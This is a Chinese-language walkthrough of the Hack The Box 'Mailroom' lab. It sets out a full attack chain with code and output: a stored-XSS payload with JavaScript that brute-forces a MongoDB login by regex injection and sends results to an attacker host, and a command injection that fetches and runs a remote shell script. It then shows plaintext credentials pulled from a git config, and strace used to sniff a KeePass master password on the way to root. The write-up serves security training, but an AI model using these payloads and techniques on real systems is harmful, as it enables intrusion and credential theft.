hackthebox Mailroom Hard难度抄wp复现

参考这位up主的:

Hack The Box 赛季活动靶场【MailRoom】System Flag攻略_哔哩哔哩_bilibili

Hack The Box 赛季活动靶场【MailRoom】User Flag攻略_哔哩哔哩_bilibili

在留言板XSS打内网的网页(这个网页存在MongoDB正则表达式注入,根据返回的http状态码,来盲注密码)

git clone https://github.com/SrcVme50/Mailroom

guess_username.js

async function callAuth(mail) {var http = new XMLHttpRequest();http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');http.onload = function () {if (/"success":true/.test(this.responseText)) {notify(mail);cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~", mail);}};http.send("email[$regex]=.*" + mail + "@mailroom.htb&password[$ne]=abc");
}
function notify(mail) {fetch("http://10.10.14.50:30088/r8.sh?" + mail);
}
function cal(chars, mail) {for (var i = 0; i < chars.length; i++) {callAuth(chars[i] + mail)}
}
var chars88 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~";
cal(chars88, "")

guess_password.js

async function callAuth2(pass) {var http = new XMLHttpRequest();http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');http.onload = function () {if (/"success":true/.test(this.responseText)) {notify2(pass);cal2("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#%'()+, -/:;<=>@[\]_`{}~", pass);}};http.send("email=tristan@mailroom.htb&password[$regex]=^"+pass);
}
function notify2(pass) {fetch("http://10.10.14.50:30088/r8.sh?" + pass);
}
function cal2(chars, pass) {for (var i = 0; i < chars.length; i++) {callAuth2(pass+chars[i])}
}
var chars99 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#%'()+, -/:;<=>@[\]_`{}~";
cal2(chars99, "");

root@071381841c9e:/var/www/staffroom# cat auth.php
<?php
require 'vendor/autoload.php';session_start(); // Start a session
$client = new MongoDB\Client("mongodb://mongodb:27017"); // Connect to the MongoDB database
header('Content-Type: application/json');
if (!$client) {header('HTTP/1.1 503 Service Unavailable');echo json_encode(['success' => false, 'message' => 'Failed to connect to the database']);exit;
}
$collection = $client->backend_panel->users; // Select the users collection// Authenticate user & Send 2FA if valid
if (isset($_POST['email']) && isset($_POST['password'])) {// Verify the parameters are validif (!is_string($_POST['email']) || !is_string($_POST['password'])) {header('HTTP/1.1 401 Unauthorized');echo json_encode(['success' => false, 'message' => 'Invalid input detected']);}// Check if the email and password are correct$user = $collection->findOne(['email' => $_POST['email'], 'password' => $_POST['password']]);if ($user) {// Generate a random UUID for the 2FA token$token = bin2hex(random_bytes(16));$now = time();// Update the user record in the database with the 2FA token if not already sent in the last minute$user = $collection->findOne(['_id' => $user['_id']]);if(($user['2fa_token'] && ($now - $user['token_creation']) > 60) || !$user['2fa_token']) {$collection->updateOne(['_id' => $user['_id']],['$set' => ['2fa_token' => $token, 'token_creation' => $now]]);// Send an email to the user with the 2FA token$to = $user['email'];$subject = '2FA Token';$message = 'Click on this link to authenticate: http://staff-review-panel.mailroom.htb/auth.php?token=' . $token;mail($to, $subject, $message);}// Return a JSON response notifying about 2faecho json_encode(['success' => true, 'message' => 'Check your inbox for an email with your 2FA token']);exit;} else {// Return a JSON error responseheader('HTTP/1.1 401 Unauthorized');echo json_encode(['success' => false, 'message' => 'Invalid email or password']);}
}// Check for invalid parameters
else if (!isset($_GET['token'])) {header('HTTP/1.1 400 Bad Request');echo json_encode(['success' => false, 'message' => 'Email and password are required']);exit;
}// Check if the form has been submitted
else if (isset($_GET['token'])) {// Verify Token parameter is validif (!is_string($_GET['token']) || strlen($_GET['token']) !== 32) {header('HTTP/1.1 401 Unauthorized');echo json_encode(['success' => false, 'message' => 'Invalid input detected']);exit;}// Check if the token is correct$user = $collection->findOne(['2fa_token' => $_GET['token']]);if ($user) {// Set the logged_in flag and name in the session$_SESSION['logged_in'] = true;$_SESSION['name'] = explode('@', $user['email'])[0];// Remove 2FA token since user already used it to log in$collection->updateOne(['_id' => $user['_id']],['$unset' => ['2fa_token' => '']]);// Redirect to dashboard since login was successfulheader('Location: dashboard.php');exit;} else {// Return a JSON error responseheader('HTTP/1.1 401 Unauthorized');echo json_encode(['success' => false, 'message' => 'Invalid 2FA Login Token']);exit;}
}?>
root@071381841c9e:/var/www/staffroom#

# 如下之前是http://10.10.14.37:77/user.js ,后期才发现火狐浏览器禁止访问77端口,像8080,和8090等高端口不做限制所以把77换成30088;

cd /tmp;
npm install -g http-server
# -g  --global  会将模块安装到全局
http-server -p 30088 --cors=access-control-allow-origin &

curl -v -d 'email=123%40gmail.com&title=Ad_maga&message=<script+src%3d"http%3a//10.10.14.50:30088/guess_username.js"></script>'   http://mailroom.htb/contact.php# curl http://mailroom.htb/inquiries/a527e53f4ffd0574844e7483ba0904a9.html |grep -C5 10.10.14.50

POST /contact.php HTTP/1.1
Host: mailroom.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://mailroom.htb
Connection: close
Referer: http://mailroom.htb/contact.php
Upgrade-Insecure-Requests: 1email=12342%40gmail.com&title=Ad_maga&message=<script+src%3d"http%3a//10.10.14.37:30088/user.js"></script>

root@79585e1c3ddf:/var/www/mailroom/template# cat ai.py
#!/usr/bin/python3
# This script is used to simulate the Ai visiting the page and rating if the inquery looks relevent or irrelevant
import os
import sys
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.firefox.service import Service# "Hack" to fix Firefox not launching without a writable home directory
os.environ["HOME"] = "/tmp"def main(id):options = Options()options.add_argument('--headless')driver = webdriver.Firefox(service=Service(executable_path='/var/www/mailroom/template/geckodriver', log_path='/dev/null'), options=options)driver.set_page_load_timeout(30)try:driver.get(f"http://127.0.0.1/inquiries/{id}.html")print(driver.title)finally:driver.close()if __name__ == '__main__':if len(sys.argv) < 2 or len(sys.argv[1]) != 32:exit()main(sys.argv[1])
root@79585e1c3ddf:/var/www/mailroom/template#

如下可以爆php路径:

root@mailroom:~#  curl -v -d "email[]=qwe&password[]=abc" http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 26
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 26 out of 26 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:19:20 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=58a2b1cce2a8d677a0f63c16d0fed89a; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 303
< Content-Type: application/json
<
{"success":false,"message":"Invalid input detected"}<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/staffroom/auth.php:20) in <b>/var/www/staffroom/auth.php</b> on line <b>51</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
{"success":false,"message":"Invalid email or password"}root@mailroom:~#
root@mailroom:~#

root@mailroom:~#  curl -v -d 'email[$regex]=.*)@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 48
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 48 out of 48 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:24:00 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=9105dc031fc8878b739a6948f2d27b79; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 917
< Content-Type: application/json
<
{"success":false,"message":"Invalid input detected"}<br />
<b>Fatal error</b>:  Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: unmatched parentheses in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php:316
Stack trace:
#0 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php(316): MongoDB\Driver\Server-&gt;executeQuery('backend_panel.u...', Object(MongoDB\Driver\Query), Array)
#1 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/FindOne.php(126): MongoDB\Operation\Find-&gt;execute(Object(MongoDB\Driver\Server))
#2 /var/www/staffroom/vendor/mongodb/mongodb/src/Collection.php(699): MongoDB\Operation\FindOne-&gt;execute(Object(MongoDB\Driver\Server))
#3 /var/www/staffroom/auth.php(24): MongoDB\Collection-&gt;findOne(Array)
#4 {main}thrown in <b>/var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php</b> on line <b>316</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
root@mailroom:~#

Regular expression is invalid: unmatched parentheses

parentheses:圆括号

root@mailroom:~#  curl -v -d 'email[$regex]=.*(@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;
*   Trying 127.0.0.1:80...
* TCP_NODELAY set
* Connected to staff-review-panel.mailroom.htb (127.0.0.1) port 80 (#0)
> POST /auth.php HTTP/1.1
> Host: staff-review-panel.mailroom.htb
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 48
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 48 out of 48 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Tue, 02 May 2023 12:27:33 GMT
< Server: Apache/2.4.54 (Debian)
< X-Powered-By: PHP/7.4.33
< Set-Cookie: PHPSESSID=87d6127a132d28b22f6e2336eb9e99e5; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Content-Length: 905
< Content-Type: application/json
<
{"success":false,"message":"Invalid input detected"}<br />
<b>Fatal error</b>:  Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: missing ) in /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php:316
Stack trace:
#0 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php(316): MongoDB\Driver\Server-&gt;executeQuery('backend_panel.u...', Object(MongoDB\Driver\Query), Array)
#1 /var/www/staffroom/vendor/mongodb/mongodb/src/Operation/FindOne.php(126): MongoDB\Operation\Find-&gt;execute(Object(MongoDB\Driver\Server))
#2 /var/www/staffroom/vendor/mongodb/mongodb/src/Collection.php(699): MongoDB\Operation\FindOne-&gt;execute(Object(MongoDB\Driver\Server))
#3 /var/www/staffroom/auth.php(24): MongoDB\Collection-&gt;findOne(Array)
#4 {main}thrown in <b>/var/www/staffroom/vendor/mongodb/mongodb/src/Operation/Find.php</b> on line <b>316</b><br />
* Connection #0 to host staff-review-panel.mailroom.htb left intact
root@mailroom:~#

Regular expression is invalid: missing )

curl -v -d 'email[$regex]=.*[@mailroom.htb&password[$ne]=abc' http://staff-review-panel.mailroom.htb/auth.php;

<b>Fatal error</b>: Uncaught MongoDB\Driver\Exception\CommandException: Regular expression is invalid: missing terminating ] for character class in /var...

ai.py脚本貌似有时间(30秒超时:driver.set_page_load_timeout(30) )限制,一次不一定会把用户名和密码完全跑出来,需要多试几次,或者手动改脚本接力.

[2023-05-02T12:48:39.661Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:40.571Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:41.191Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:48:42.313Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"[2023-05-02T12:50:07.703Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:16.170Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:17.026Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:17.700Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:18.075Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:19.371Z]  "GET /r8.sh?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:21.002Z]  "GET /r8.sh?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:23.135Z]  "GET /r8.sh?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:24.445Z]  "GET /r8.sh?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:26.546Z]  "GET /r8.sh?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:27.895Z]  "GET /r8.sh?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:30.574Z]  "GET /r8.sh?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:50:31.304Z]  "GET /r8.sh?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"[2023-05-02T12:51:56.771Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:57.689Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:58.201Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:51:59.442Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T12:52:04.265Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

继续想办法把时间拉长的30秒极限:

curl -v -d 'email=qax%40gmail.com&title=maga2023&message=<script+src%3d"http%3a//10.10.14.50:30088/guess_username.js"></script><script+src%3d"http%3a//10.10.14.50:8090/?c=123"></script>'   http://mailroom.htb/contact.php

生成的html包含2个js加载器,第二个的服务器端为php( http://10.10.14.50:8090/)

http://10.10.14.50:8090/?c=123 的内容为:

echo "<?php set_time_limit(600);sleep(120);">/tmp/index.php ;

启动php的命令为:

cat /tmp/index.php ;
setsid php -n -S 0.0.0.0:8090 -t /tmp&

这样制作的话,服务器里的selenium不会那么快退出.

在30秒内,username能猜解完毕,password还差几位字符,需要接力(不接力了,多试几次就ok):

[2023-05-02T15:39:12.945Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:19.952Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:20.744Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:21.258Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:21.683Z]  "GET /r8.sh?stan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:23.333Z]  "GET /r8.sh?istan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:24.978Z]  "GET /r8.sh?ristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:26.546Z]  "GET /r8.sh?tristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"[2023-05-02T15:39:54.784Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:55.901Z]  "GET /r8.sh?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:56.770Z]  "GET /r8.sh?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:57.557Z]  "GET /r8.sh?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:39:59.597Z]  "GET /r8.sh?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:02.004Z]  "GET /r8.sh?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:04.039Z]  "GET /r8.sh?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:06.605Z]  "GET /r8.sh?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:08.711Z]  "GET /r8.sh?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:10.680Z]  "GET /r8.sh?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:11.877Z]  "GET /r8.sh?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:14.318Z]  "GET /r8.sh?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-02T15:40:20.160Z]  "GET /r8.sh?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

ssh仅仅允许tristan登录:

grep Match /etc/ssh/sshd_config;

# ssh -o StrictHostKeyChecking=no root@10.10.11.209

# paaword: a$gBa3!GA8

ssh -o StrictHostKeyChecking=no tristan@10.10.11.209

tristan 密码:69trisRulez!

ssh登录成功后:

#使用curl发送登录请求:curl -v -d "email=tristan%40mailroom.htb&password=69trisRulez%21" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878"    http://staff-review-panel.mailroom.htb/auth.php;
# 状态码200 {"success":true,"message":"Check your inbox for an email with your 2FA token"}grep -o -E "(http://.*)" /var/mail/tristan
# 选最后一条:
myurl2=$(grep -o -E "(http://.*)" /var/mail/tristan|tail -n 1);
echo $myurl2;#访问激活邮件:
#http://staff-review-panel.mailroom.htb/auth.php?token=2ae50255deba57587ac9f9555857beeb
curl -v -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" $myurl2|grep message
# 状态码302 重定向到dashboard.php#访问主页,这一步可以不要:
#curl -v -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" http://staff-review-panel.mailroom.htb/dashboard.php#插入恶意命令:
curl -v --data-binary "inquiry_id=\`sleep+12
curl+-o+/tmp/3r2+http://10.10.14.37:77/r0.sh
bash+/tmp/3r2
echo+-n+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php

反弹shell成功后,发现是在容器里,执行如下一句话看密码:

cat /var/www/mailroom/.git/config /var/www/staffroom/.git/config

url = http://matthew:HueLover83%23@gitea:3000/matthew/mailroom.git

得到matthew密码是:
HueLover83#

回到虚拟机的shell里:

su - matthew

matthew@mailroom:~$ cat ~/user.txt
a371327b52dde700c969109e3315ac3c
matthew@mailroom:~$

ls -al /home/matthew/personal.kdbx; python3 -V ;

scp上传密码库到kali,这一步后来发现也没有必要,直接在靶机里使用kpcli破解密码就行:

scp -P 40022 -o StrictHostKeyChecking=no \
/home/matthew/personal.kdbx root@10.10.14.37:/tmp/

提示: 靶机是台虚拟机,会自动清除/tmp目录的文件,但是以.开头的隐藏文件无法删除,所以我保存在/tmp目录下的.pwd.log里.

# strace -o /tmp/.pwd.log -p ` ps -ef|grep kpcli|grep perl|awk '{print $2}' `

matthew@mailroom:/tmp$ ./ps  aux
PID   USER     TIME  COMMAND
42939 matthew   0:00 -bash
43013 matthew   0:00 /lib/systemd/systemd --user
43019 matthew   0:00 {kpcli} /usr/bin/perl /usr/bin/kpcli
43023 matthew   0:00 ./ps aux
matthew@mailroom:/tmp$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
matthew    42939  0.2  0.1   8392  5148 pts/2    S    15:57   0:00 -bash
matthew    43013  0.6  0.2  19188  9764 ?        Ss   15:57   0:00 /lib/systemd/systemd --user
matthew    43019  1.2  0.6  29520 24468 ?        Ss   15:57   0:00 /usr/bin/perl /usr/bin/kpcli
matthew    43030  0.0  0.0   8888  3232 pts/2    R+   15:57   0:00 ps aux
matthew@mailroom:/tmp$ strace   -o  /tmp/.pwd.log  -p  ` ps -ef|grep kpcli|grep perl|awk '{print $2}' `
strace: option requires an argument -- 'p'
Try 'strace -h' for more information.
matthew@mailroom:/tmp$#  这是因为进程没有启动,它会每隔1分钟启动一次.稍等一会就好

grep "read(0" /tmp/.pwd.log |grep -v unavailable

# grep -E "read|write" /tmp/.pwd.log|grep 8192 |grep read|grep -v unavailable

matthew@mailroom:/tmp$ grep 8192 /tmp/.pwd.log |grep "read(0"|grep -v unavailable
read(0, "!", 8192)                      = 1
read(0, "s", 8192)                      = 1
read(0, "E", 8192)                      = 1
read(0, "c", 8192)                      = 1
read(0, "U", 8192)                      = 1
read(0, "r", 8192)                      = 1
read(0, "3", 8192)                      = 1
read(0, "p", 8192)                      = 1
read(0, "4", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "w", 8192)                      = 1
read(0, "0", 8192)                      = 1
read(0, "1", 8192)                      = 1
read(0, "\10", 8192)                    = 1
read(0, "r", 8192)                      = 1
read(0, "d", 8192)                      = 1
read(0, "9", 8192)                      = 1
read(0, "\n", 8192)                     = 1
matthew@mailroom:/tmp$

root@fv-az345-528:/tmp# grep -E "read|write"   /tmp/123123.txt|grep 8192 |grep read|grep -v unavailable
read(5, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(0, "!", 8192)                      = 1
read(0, "s", 8192)                      = 1
read(0, "E", 8192)                      = 1
read(0, "c", 8192)                      = 1
read(0, "U", 8192)                      = 1
read(0, "r", 8192)                      = 1
read(0, "3", 8192)                      = 1
read(0, "p", 8192)                      = 1
read(0, "4", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "w", 8192)                      = 1
read(0, "0", 8192)                      = 1
read(0, "1", 8192)                      = 1
read(0, "\10", 8192)                    = 1
read(0, "r", 8192)                      = 1
read(0, "d", 8192)                      = 1
read(0, "9", 8192)                      = 1
read(0, "\n", 8192)                     = 1
read(5, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(5, "\npackage Compress::Raw::Zlib;\n\nr"..., 8192) = 8192
read(5, " if $validate && $value !~ /^\\d+"..., 8192) = 8192
read(5, "    croak \"Compress::Raw::Zlib::"..., 8192) = 8192
read(5, "# XML::Parser\n#\n# Copyright (c) "..., 8192) = 8192
read(6, "package XML::Parser::Expat;\n\nuse"..., 8192) = 8192
read(6, ";\n    }\n}\n\nsub position_in_conte"..., 8192) = 8192
read(5, "package MIME::Base64;\n\nuse stric"..., 8192) = 5450
read(6, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(6, "", 8192)                       = 0
read(7, "# NOTE: Derived from blib/lib/Te"..., 8192) = 665
read(7, "", 8192)                       = 0
root@fv-az345-528:/tmp#

\10是删除键

如上得知: 密码库的密码是: !sEcUr3p4$$w0rd9

!sEcUr3p4$$w0rd9

如下自己没有必要安装kpcli,靶机自己就有,直接拿来用,也可以的

keepass2是图形界面工具,本次不用也可以

ubuntu20.04 安装keepass
sudo apt-add-repository ppa:jtaylor/keepass;\
sudo apt-get update && sudo apt-get upgrade;\
sudo apt-get install keepass2 -y;\
sudo apt install kpcli  -y;2.运行keepass2root@fv-az345-528:/tmp# keepass2 --version
KeePass 2.45
Copyright ? 2003-2020 Dominik Reichl
root@fv-az345-528:/tmp#

kpcli  --kdb /tmp/personal.kdbx
ls
cd Root/
ls
show -f -a 4
quitkpcli:/> cd Root/
kpcli:/Root> ls
=== Entries ===
0. food account                                            door.dash.local
1. GItea Admin account                                    git.mailroom.htb
2. gitea database password
3. My Gitea Account                                       git.mailroom.htb
4. root acc
kpcli:/Root> show -f -a 4Title: root acc
Uname: rootPass: a$gBa3!GA8URL:
Notes: root account for sysadmin jobs
Icon#: 0
Creat: 2023-03-15 21:43:57
Modif: 2023-03-15 21:44:42
Xpire: Neverkpcli:/Root> quit

matthew@mailroom:~$ kpcli  --kdb ~/personal.kdbx
Please provide the master password: *************************KeePass CLI (kpcli) v3.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root/
kpcli:/Root> ls
=== Entries ===
0. food account                                            door.dash.local
1. GItea Admin account                                    git.mailroom.htb
2. gitea database password
3. My Gitea Account                                       git.mailroom.htb
4. root acc
kpcli:/Root> show -a -f 4Title: root acc
Uname: rootPass: a$gBa3!GA8URL:
Notes: root account for sysadmin jobs
Icon#: 0
Creat: 2023-03-15 21:43:57
Modif: 2023-03-15 21:44:42
Xpire: Neverkpcli:/Root> quit
matthew@mailroom:~$

matthew@mailroom:/tmp$ su -
Password:
root@mailroom:~# ls
cleanup.sh  cleanup.sh.bak  containers  kpcli.sh  matthew_kpcli.py  matthew_kpcli.py.bak  personal.kdbx  personal.kdbx.bak  root.txt
root@mailroom:~# cat root.txt
7fe0c9a1297e4b3fb9ab8259c67c63a1
root@mailroom:~#
root@mailroom:~# docker ps -a
CONTAINER ID   IMAGE                    COMMAND                  CREATED        STATUS        PORTS                               NAMES
ed9dafc5f146   containers_sites         "docker-php-entrypoi…"   14 hours ago   Up 14 hours   0.0.0.0:80->80/tcp, :::80->80/tcp   containers_sites_1
be13e7868b63   gitea/gitea:1.18         "/usr/bin/entrypoint…"   14 hours ago   Up 14 hours   22/tcp, 3000/tcp                    containers_gitea_1
a792a1685ae4   postgres:15.1-bullseye   "docker-entrypoint.s…"   14 hours ago   Up 14 hours   5432/tcp                            containers_db_1
178ce6c64a6b   mongo:4.2.23             "docker-entrypoint.s…"   14 hours ago   Up 14 hours   27017/tcp                           containers_mongodb_1
root@mailroom:~# id
uid=0(root) gid=0(root) groups=0(root)
root@mailroom:~# # 这步应该不需要了# docker exec -it containers_sites_1  /bin/bash -c 'chmod +s /bin/bash'

猜测: 一旦root登录成功 perl和kpcli进程就都没了.

看下面,猜的不准,是每隔1分钟运行kpcli进程,每隔3分钟清理

root@mailroom:~# cat ~/cleanup.sh
#!/bin/bash# Clear inquiries
/usr/bin/rm -rf /root/containers/sites/mailroom/inquiries/*# Copy back template inquiry
/usr/bin/cp /root/containers/5657465f7712d50b2aaceaa09453c71f.html /root/containers/sites/mailroom/inquiries/# Restore gitea
/usr/bin/rm -rf /root/containers/gitea/*
/usr/bin/cp -r /root/containers/gitea_backup/* /root/containers/gitea/# Clear tmp files
